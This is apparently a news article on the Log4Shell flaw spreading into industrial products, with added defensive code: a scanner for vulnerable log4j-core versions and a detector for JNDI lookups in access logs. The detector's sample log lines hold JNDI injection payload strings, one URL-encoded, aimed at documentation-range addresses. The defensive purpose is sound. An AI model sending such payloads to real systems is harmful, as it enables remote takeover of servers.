Log4j vulnerability now hits industrial sector, as CISA calls upon users to ​​identify, mitigate, patch affected products


Siemens identified on Monday the presence of the Apache Log4j vulnerability in some of its product lines, which could potentially be exploited by remote unauthenticated attackers to execute code on vulnerable systems. The affected products include E-Car OC Cloud Application, EnergyIP, Industrial Edge Management App (IEM-App), Industrial Edge Management OS (IEM-OS), Industrial Edge Management Hub, LOGO! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, SIMATIC WinCC v7.4, Siveillance Command, Siveillance Control Pro, and Siveillance Vantage.

Data analyzed by industrial cybersecurity company Dragos has found that the Log4j vulnerability, which is vendor-agnostic and affects both proprietary and open-source software, will leave several industries exposed to remote exploitation, including electric power, water, food and beverage, manufacturing, and transportation.

In addition to identifying various mitigations, Siemens advised users to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens operational guidelines for industrial security.

Another industrial cybersecurity vendor, Schneider Electric, said in an advisory on Monday that it “continues to assess how the Log4j vulnerabilities affect its offers, and will update customers through its Cybersecurity Support Portal as product-specific mitigation information becomes available.” 

The French vendor also advised customers to use an IoT/OT-aware network detection and response (NDR) solution and SIEM/SOAR solution to auto-discover and continuously monitor devices for anomalous or unauthorized behaviors, such as communication with unfamiliar local or remote hosts.

Log4j 2 is an open-source Java logging library developed by the Apache Foundation and deployed across enterprise apps and cloud services. Tracked as CVE-2021-44228 and dubbed ‘Log4Shell,’ the Log4j vulnerability is an unauthenticated remote code execution (RCE) flaw that allows complete takeover of systems using Log4j versions 2.0-beta9 up to 2.14.1. Apache has released Log4j 2.15.0 to resolve the vulnerability, which is trivial to exploit.

Dragos said that it “assesses with high confidence that this vulnerability will impact Operational Technology (OT) networks, based on the ubiquity of the library and the rapidly growing methodologies of exploitation,” according to a company blog post. “Dragos Intelligence has observed both attempted and successful exploitation of the Log4j vulnerability in the wild and based on these observations already coordinated a takedown of one of the malicious domains used in early exploitation attempts,” it added.

Log4j is found in open-source repositories used in numerous industrial applications, such as Object Linking and Embedding for Process Control (OPC) Foundation’s Unified Architecture (UA) Java Legacy, Dragos said. “Additionally, adversaries can leverage this vulnerability in proprietary Supervisory Control and Data Acquisition (SCADA) and Energy Management Systems (EMS) which make use of Java in their codebase,” it added. 

Major OT vendors have begun to disclose the impact of this vulnerability on their software and equipment, and additional disclosures will continue as vendors work to identify the use of Log4j across their product lines, Dragos said. “Unfortunately, the nature of the Log4j vulnerability makes it challenging to identify potentially impacted servers on a given network. While network-facing services written in Java are most obviously at risk, the vulnerability can technically impact any server (including back-end resources) where user supplied data is processed and logged,” the company added.
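Because the difficulty Dragos describes is largely one of inventory, the first practical step for an asset owner is to find every copy of log4j-core on disk, including copies buried inside WARs, EARs and fat JARs, and compare the version against the affected range. The following scanner is an added example, not code from Dragos, Siemens or the Apache project; it assumes the JAR still carries its Maven `pom.properties` metadata (true of official builds; a repackaged or shaded copy may need an additional class-name check). The sample JAR layout it scans is constructed inside a temporary directory.

```python
"""Added example: locate log4j-core JARs (nested archives included) and flag the
versions the page gives as affected by CVE-2021-44228 (2.0-beta9 .. 2.14.1)."""
import io
import os
import re
import tempfile
import zipfile
from typing import Iterator, List, Optional, Tuple

# Maven metadata path inside an official log4j-core JAR (assumption: present).
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 15, 0)          # first release that resolves the flaw, per the page
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(ver: str) -> Tuple[int, int, int, str]:
    """'2.14.1' -> (2, 14, 1, ''); '2.0-beta9' -> (2, 0, 0, 'beta9')."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(.+))?$", ver.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {ver!r}")
    major, minor, patch, tag = m.groups()
    return int(major), int(minor), int(patch or 0), tag or ""


def is_affected(ver: str) -> bool:
    """True if ver falls inside 2.0-beta9 .. 2.14.1."""
    major, minor, patch, tag = parse_version(ver)
    if major != 2 or (major, minor, patch) >= FIXED:
        return False
    if (minor, patch) == (0, 0) and tag:
        # 2.0 pre-releases: beta9 and everything after it (rc builds) are affected
        m = re.match(r"^(alpha|beta|rc)(\d+)$", tag)
        if m is None:
            return True                  # unknown tag: treat as affected (safer)
        kind, num = m.group(1), int(m.group(2))
        return kind == "rc" or (kind == "beta" and num >= 9)
    return True


def log4j_core_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Read the log4j-core version from the JAR's Maven metadata, if present."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(zf: zipfile.ZipFile, where: str) -> Iterator[Tuple[str, str]]:
    """Yield (location, version) for this archive and every archive nested in it."""
    ver = log4j_core_version(zf)
    if ver:
        yield where, ver
    for name in zf.namelist():
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue                 # not actually a zip; skip it
            yield from scan_archive(inner, f"{where}!/{name}")


def scan_tree(root: str) -> List[Tuple[str, str, bool]]:
    """Walk root; return (location, version, affected) for each log4j-core found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, fname)
            try:
                zf = zipfile.ZipFile(path)
            except zipfile.BadZipFile:
                continue
            for where, ver in scan_archive(zf, path):
                findings.append((where, ver, is_affected(ver)))
    return sorted(findings)


def make_log4j_jar(version: str) -> bytes:
    """Constructed stand-in for a log4j-core JAR; only the metadata matters here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
    return buf.getvalue()


def build_sample_tree(root: str) -> None:
    """Constructed layout: a vulnerable JAR, a fixed JAR, and a WAR embedding a vulnerable JAR."""
    os.makedirs(os.path.join(root, "lib"))
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(make_log4j_jar("2.14.1"))
    with open(os.path.join(root, "lib", "log4j-core-2.15.0.jar"), "wb") as f:
        f.write(make_log4j_jar("2.15.0"))
    with zipfile.ZipFile(os.path.join(root, "hmi.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.11.2.jar", make_log4j_jar("2.11.2"))


def demo() -> List[Tuple[str, str, bool]]:
    """Scan the constructed tree; return locations relative to its root."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return [(w[len(tmp) + 1:], v, a) for w, v, a in scan_tree(tmp)]


if __name__ == "__main__":
    for where, ver, affected in demo():
        print(f"{'AFFECTED' if affected else 'ok      '} {ver:<10} {where}")
```

The nested-archive walk is the part that matters in practice: the vulnerable copy is rarely a loose JAR in a lib directory and far more often sits inside a deployed WAR or a vendor's fat JAR, which a filename-only search would miss. A version in the affected range is a finding to triage, not proof of exploitability, but a copy at or above 2.15.0 can be set aside for this CVE.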

While the Lightweight Directory Access Protocol (LDAP) attack vector received most of the initial attention, Dragos said it has observed attempted attacks using Domain Name System (DNS) and Remote Method Invocation (RMI) as well, and that the list of potential protocols and methods for exploitation will continue to grow.

“For an OT network incorporating robust segmentation, the risk from these protocols will be mitigated to an extent; however, OT elements such as SCADA/EMS configured for remote access may utilize LDAP for password management and therefore be vulnerable to exploitation, particularly by an adversary moving laterally within a network,” Dragos said. “OT networks with weak segmentation from business Information Technology (IT) networks will be most impacted by this vulnerability, even more so as additional protocols are discovered to enable exploitation,” it added. 

Nozomi Networks, another industrial cybersecurity company, said on Tuesday that “the essence of the vulnerability lies in the fact that the log4j utility had message lookup substitution enabled by default. As a result, attackers can craft a special request that would make the utility remotely download and execute the payload,” according to a company blog post. “Other protocols like DNS, RMI and LDAPS may also be misused. This behavior has been fixed in the recent release of Apache Log4j 2.15.0,” it added. 
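The crafted request Nozomi describes has to arrive somewhere, and the monitoring Schneider Electric recommends needs a concrete rule to act on. The following detector, an added example that is not code from Nozomi, Schneider Electric or Dragos, runs over constructed Apache-style access log lines (TEST-NET addresses, not real traffic) and reports every JNDI lookup string after undoing URL encoding and case folding, tagging the scheme against the protocols the page names (LDAP, LDAPS, RMI, DNS) and still reporting any other scheme.

```python
"""Added example: flag JNDI lookup strings in web access logs, the signal a SIEM
rule or NDR sensor would raise for the crafted requests described on the page."""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

# Lookup targets named on the page; any other scheme is still reported.
KNOWN_SCHEMES = {"ldap", "ldaps", "rmi", "dns"}

# Matches ${jndi:<scheme>:...} once the text has been decoded and lower-cased.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:")

# Constructed sample access log lines (not from the page, not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.11 - - [13/Dec/2021:10:02:11 +0000] "GET /?q=${jndi:dns://203.0.113.11/p} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.12 - - [13/Dec/2021:10:03:15 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F203.0.113.12%2Fx%7D HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.6 - - [13/Dec/2021:10:04:00 +0000] "POST /api/v1 HTTP/1.1" 200 10 "-" "python-requests/2.26"',
]


def normalize(text: str) -> str:
    """Undo URL encoding (twice, to cover double-encoded input) and case-fold."""
    return unquote(unquote(text)).lower()


def detect_jndi_lookups(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per JNDI lookup string seen in the given log lines."""
    findings: List[Dict[str, object]] = []
    for lineno, raw in enumerate(lines, 1):
        text = normalize(raw)
        for m in JNDI_RE.finditer(text):
            scheme = m.group(1)
            findings.append({
                "line": lineno,
                "src": raw.split(" ", 1)[0],        # client address, first field
                "scheme": scheme,
                "known": scheme in KNOWN_SCHEMES,
                "fragment": text[m.start():m.start() + 60],
            })
    return findings


def summarize(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count findings per lookup scheme, for a quick triage overview."""
    return dict(Counter(str(f["scheme"]) for f in findings))


if __name__ == "__main__":
    hits = detect_jndi_lookups(SAMPLE_LOGS)
    for f in hits:
        print(f"line {f['line']}: {f['src']} scheme={f['scheme']} {f['fragment']}")
    print(summarize(hits))
```

A hit here records an attempt, not a compromise: the access log is written by the web server, and what matters is whether a Java application behind it passed that field to a vulnerable Log4j instance. That is the triage Dragos's point about "any server where user supplied data is processed and logged" leads to, so each finding should be correlated with the application logs for the same request.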

The Cybersecurity and Infrastructure Security Agency (CISA) said on Monday that Log4j is widely used in a variety of consumer and enterprise services, websites, and applications, as well as in operational technology (OT) products, to log security and performance information. The agency identified that an unauthenticated remote hacker could exploit this vulnerability to take control of an affected system.

The security agency has asked vendors to identify, mitigate, and patch affected products using Log4j, and inform end-users of products that contain this vulnerability, and urge them to prioritize software updates. 

Affected versions of Log4j contain Java Naming and Directory Interface (JNDI) features that “do not protect against adversary-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI related endpoints,” CISA said. An adversary can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code, giving the adversary full control over it. The adversary can then steal information, launch ransomware, or conduct other malicious activity.

The severity of the Apache Log4j vulnerability is beginning to emerge in the industrial sector, as vendors identify the presence of the cross-cutting vulnerability in their product lines.

The discovery of a critical flaw in the Apache Log4j software is nothing short of a Fukushima moment for the cybersecurity industry, Renaud Deraison, co-founder and CTO at Tenable, wrote in a company blog. “We’re discovering new apps every minute which use Log4j in one way or another. It affects not only the code you build, but also the third-party systems you have in place.”

“The irony of this flaw is that it could end up enabling attackers to exploit the very logging practices that are the bellwether of sound security practices: the more secure your organization is, the more you’ll log every action, which means you’re sitting on a bigger pool of logging data with the potential to be exploited,” Deraison added.
